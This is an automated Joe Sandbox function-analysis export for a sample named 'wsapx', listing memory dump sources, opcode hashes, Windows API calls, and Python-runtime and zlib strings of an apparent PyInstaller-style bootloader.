                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction ID: 91115e2fd1bbbc9c0d303a93905b340650122a0185ad83e0113169f1e32c1d17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05116322A1C64183EA65BF91B40117EEAA8BFC5FA4FE44031EB4C57B96DF7DD4428720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction ID: 4729124711d76494614b91328dfee41258d6470ea0af0efbe755ef49afc87248
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2721837261864187DB62AF18E480379B6A0EBE4FB4F944234EA9D876D5DF7CD4028F10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction ID: f6c624080fd01c9890cb2498434e2ff58dc09a8d64f37a1bf1b7886543d957e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF01C431A0874146EA04FF96AD0106AE695BFD5FF0F984631EE6C5BBD6DE3CE5028310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                • Instruction ID: fe10343f198e6734e4790a2f5ffa73b57373fd4c0698af970ccc4210dbe12608
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2016D20A0D29242FA607EB67581179D198BFC4FF0FD84535EA6D42AC6DFACE4438231
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                • Instruction ID: 362a469510fa405fcc22d39d849bdaad389b89e99b0702a8ebd5c86ae2d8e5eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E0C2A0E0C60783F7103EFA28C617994149FC5BA0FC04430ED18462C3DE2C684BC232
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF7C71CB39A,?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA), ref: 00007FF7C71CEC5D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                • Instruction ID: cccbe37436859df738cdab2794b81630fca69fc4e60cb135377515b58be32a98
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF04950B5930683FE557FE278912B5C2985FD4FA0FEC5430C90E862D1EE2CE58A8634
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF7C71C0D00,?,?,?,00007FF7C71C236A,?,?,?,?,?,00007FF7C71C3B59), ref: 00007FF7C71CD6AA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction ID: 6fe09de0fc86655cb88ede0b83711b0c73477b4470f958b3ba79741fac8337df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F03A10A1966657FE657FE17842274E2904FD4FB0F880230DD6E856C1DE2CA442D630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5830
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5842
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5879
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B588B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58B6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58CF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58E1
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58FD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B590F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B592B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B593D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5959
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B596B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5987
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5999
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59B5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59C7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction ID: 7dec1d2d26a0ae70cfd4d748e6ddabc666cda4741c6470c63d478efb003596ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E122C564949B4787FA16BF55B8945B4A3B1AFE8FB0FC45539C81F02260FF3CA14A9630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                • Instruction ID: 0f8a9671fc0babc612c46c306e5522249f545c2bae9a86e6f932317e6fe4f300
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAB2FA72A182828BE7269F65E4807FDB7A1FBA4B54F801135DE1D57A84DF3CA902CF50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                                                • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                • Instruction ID: 5aa1c08e7a7f1f04a0f112e0cf622d39537dabbdea5d8ad6a0bd341d793eeca8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D5227B2A146A58BD7A49F24E458B7D7BEDFB84710F414139EA4A83780DF3CE945CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction ID: 6a104862ae6561733dc76e785dff575b3bbab90e2287dd45460b8c10d47dd31b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90311072618A8186EB649F60E8803EE7364FBD4B54F444439DA4E47B94EF3CD649CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5CB5
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA979
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA99E
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5CA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F1A
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F2B
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F3C
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                                • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                • Instruction ID: 49fe52c0efb54c8bef4b2294bfeb5a3deef8481bdeba1ae34178854efd9d065f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D1A222A0825247E721FF25E8911B9E761FFE4FA4FC48136EA4D47695DF3CE4428B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
